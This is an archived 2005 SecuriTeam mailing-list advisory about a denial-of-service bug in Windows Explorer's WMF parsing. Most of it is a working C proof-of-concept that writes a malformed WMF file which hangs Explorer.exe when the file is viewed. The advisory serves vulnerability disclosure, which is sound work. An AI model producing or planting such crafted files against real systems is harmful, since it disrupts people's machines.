[EXPL] Explorer.exe WMF Parsing DoS (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 04/17/05

  • Next message: SecuriTeam: "[UNIX] Mozilla Suite and Firefox "favicons" LINK Code Execution (Exploit)" 
    To: list@securiteam.com
Date: 17 Apr 2005 17:10:22 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Explorer.exe WMF Parsing DoS (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    A crafted .WMF file cause the Explorer.exe process to use 100% of CPU and
    can cause the system to hang until the process is killed.

    DETAILS

    Exploit:
    /*
    * Created by: RiP
    * This is a proof of concept for the WMF parsing bug (this has not yet
    been patched by Microsoft)
    * Credits go to liquid (liquid@cyberspace.org)
    * Tested on: Windows XP SP1 and Windows 2000 SP4
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    char hexcode[]=

    "\xD7\xCD\xC6\x9A\x00\x00\x00\x00\x00\x00\xA1\x21\xEC\x29\xEC\x09"
    "\x00\x00\x00\x00\xB0\x56\x01\x00\x09\x00\x00\x03\x0E\x00\x00\x00"
    "\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x02\x00\x00"
    "\x00\x00";

    int main(int argc,char *argv[]) {
     FILE *wmffile;

     if (argc < 2) {
      printf("Syntax: %s <filename.wmf>\n", argv[0]);
      exit(1);
     }

     if (!(wmffile = fopen(argv[1],"wb"))) {
      printf("Error opening %s\n", argv[1]);
     } else {
      fwrite(hexcode,1,sizeof(hexcode),wmffile);
      fclose(wmffile);
      printf("Specially crafted .wmf file\n");
      printf("Double click or move the mouse over the file in windows
    explorer\n");
      printf("Then press CTRL+SHIFT+ESC (notice the 100%) and terminate
    Explorer.EXE\n");
     }

     return 0;
    }

    /* EOF */

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:westsidaz69@hotmail.com>
    Nick H.
    The original report for this a advisory can be found at:
    <http://www.securiteam.com/windowsntfocus/5CP081FFFY.html>
    http://www.securiteam.com/windowsntfocus/5CP081FFFY.html

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] Mozilla Suite and Firefox "favicons" LINK Code Execution (Exploit)"

    Relevant Pages

    • [NT] Microsoft Excel Length Parameter Parsing Buffer Overflow Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... * Microsoft Office XP Software (Excel 2002) ... * Microsoft Office v. X for Mac ...
      (Securiteam)
    • [NT] ZipGenius Directory Traversal
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ZipGenius does not check before it unpacks a file, ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] Ipswitch WhatsUp Gold Remote Buffer Overflow Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WhatsUp Gold Remote Buffer Overflow Vulnerability, ... print $socket "Referer: ...
      (Securiteam)
    • [NT] AOL Nullsoft Winamp IT Module Heap Memory Corruption (IN_MOD.DLL)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... run arbitrary code in context of user running AOL Nullsoft Winamp. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NT] Symantec AntiVirus Engine CAB Parsing Heap Overflow Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Symantec AntiVirus Engine CAB Parsing Heap Overflow Vulnerability ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)